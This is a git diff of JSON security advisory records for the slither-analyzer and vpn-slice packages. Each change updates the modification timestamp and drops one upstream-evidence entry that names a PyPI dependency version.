"registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34518.json b/advisories/BREW-slither-analyzer-CVE-2026-34518.json index e9fa69e694e..0ef30912a0c 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34518.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34518.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34518", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-966j-vmvw-g2g9", "CVE-2026-34518", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34519.json b/advisories/BREW-slither-analyzer-CVE-2026-34519.json index a7916668bf6..f33ea6841df 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34519.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34519.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34519", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-mwh4-6h8g-pg8w", "CVE-2026-34519", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34520.json b/advisories/BREW-slither-analyzer-CVE-2026-34520.json index 8a4978b8a06..5e9e13f324f 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34520.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34520.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34520", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-63hf-3vf5-4wqf", "CVE-2026-34520", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34525.json b/advisories/BREW-slither-analyzer-CVE-2026-34525.json index 35d49208557..ecf82ae1878 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34525.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34525.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34525", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-c427-h43c-vf67", "CVE-2026-34525", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34993.json b/advisories/BREW-slither-analyzer-CVE-2026-34993.json index bd0d3c3e41f..c3da5e8964b 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34993.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34993.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34993", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-jg22-mg44-37j8", "CVE-2026-34993", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-40072.json b/advisories/BREW-slither-analyzer-CVE-2026-40072.json index 5e1bf9d981f..563e571ccb4 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-40072.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-40072.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-40072", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-5hr4-253g-cpx2", "CVE-2026-40072", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "web3", - "subject_version": "7.16.0", - "key": "pkg:pypi/web3@7.16.0", - "resource": "web3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-44431.json b/advisories/BREW-slither-analyzer-CVE-2026-44431.json index 8fc412727fa..27f9e92275a 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-44431.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-44431", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-44432.json b/advisories/BREW-slither-analyzer-CVE-2026-44432.json index 59c335935e2..3ca4c9d45f7 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-44432.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-44432", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-45409.json b/advisories/BREW-slither-analyzer-CVE-2026-45409.json index 6e24364f414..83239ed21d7 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-45409.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-45409", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-47265.json b/advisories/BREW-slither-analyzer-CVE-2026-47265.json index 38cd7b4817f..55ed337caa5 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-47265.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-47265.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-47265", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-hg6j-4rv6-33pg", "CVE-2026-47265", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-50269.json b/advisories/BREW-slither-analyzer-CVE-2026-50269.json index f1880f3bff6..35c95df173b 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-50269.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-50269.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-50269", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-m6qw-4cw2-hm4m", "CVE-2026-50269", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-54273.json b/advisories/BREW-slither-analyzer-CVE-2026-54273.json index b0f73406a4f..c5906f28f85 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-54273.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-54273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-54273", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-4fvr-rgm6-gqmc", "CVE-2026-54273", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-54274.json b/advisories/BREW-slither-analyzer-CVE-2026-54274.json index fddd9d0685c..abd0df7711f 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-54274.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-54274.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-54274", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-xcgm-r5h9-7989", "CVE-2026-54274", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-54275.json b/advisories/BREW-slither-analyzer-CVE-2026-54275.json index 96d0eb10e69..cecfc4c3fc3 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-54275.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-54275.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-54275", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-4m7w-qmgq-4wj5", "CVE-2026-54275", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-54276.json b/advisories/BREW-slither-analyzer-CVE-2026-54276.json index 5db55a72423..9da000fca10 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-54276.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-54276.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-54276", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-hpj7-wq8m-9hgp", "CVE-2026-54276", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-54277.json b/advisories/BREW-slither-analyzer-CVE-2026-54277.json index 25c066a4fe8..16180b2889b 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-54277.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-54277.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-54277", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-63hw-fmq6-xxg2", "CVE-2026-54277", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-54278.json b/advisories/BREW-slither-analyzer-CVE-2026-54278.json index b74bbb404b4..0a232813841 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-54278.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-54278.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-54278", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-g3cq-j2xw-wf74", "CVE-2026-54278", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-54279.json b/advisories/BREW-slither-analyzer-CVE-2026-54279.json index 222210f9c8d..291d4ff7409 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-54279.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-54279.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-54279", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-2fqr-mr3j-6wp8", "CVE-2026-54279", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-54280.json b/advisories/BREW-slither-analyzer-CVE-2026-54280.json index ea97e59623a..c3cb6e5c5fc 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-54280.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-54280.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-54280", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-9x8q-7h8h-wcw9", "CVE-2026-54280", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-59881.json b/advisories/BREW-slither-analyzer-CVE-2026-59881.json index f4e629884e1..acab729a15f 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-59881.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-59881.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-59881", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-mq44-7p77-q5h7", "CVE-2026-59881", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-69243.json b/advisories/BREW-slither-analyzer-CVE-2026-69243.json index 11bf883365e..d662a10528a 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-69243.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-69243.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-69243", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-mfx4-hv73-q22v", "CVE-2026-69243", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-69244.json b/advisories/BREW-slither-analyzer-CVE-2026-69244.json index 68ee337ed73..b2ef3233dba 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-69244.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-69244.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-69244", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-cq5v-8q36-5273", "CVE-2026-69244", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vpn-slice-CVE-2023-29483.json b/advisories/BREW-vpn-slice-CVE-2023-29483.json index c9a4f0585ec..5e5a1faacb3 100644 --- a/advisories/BREW-vpn-slice-CVE-2023-29483.json +++ b/advisories/BREW-vpn-slice-CVE-2023-29483.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vpn-slice-CVE-2023-29483", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-3rq5-2g8h-59hc", "CVE-2023-29483", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "dnspython", - "subject_version": "2.8.0", - "key": "pkg:pypi/dnspython@2.8.0", - "resource": "dnspython" - }, { "strategy": "registry", "ecosystem": "PyPI",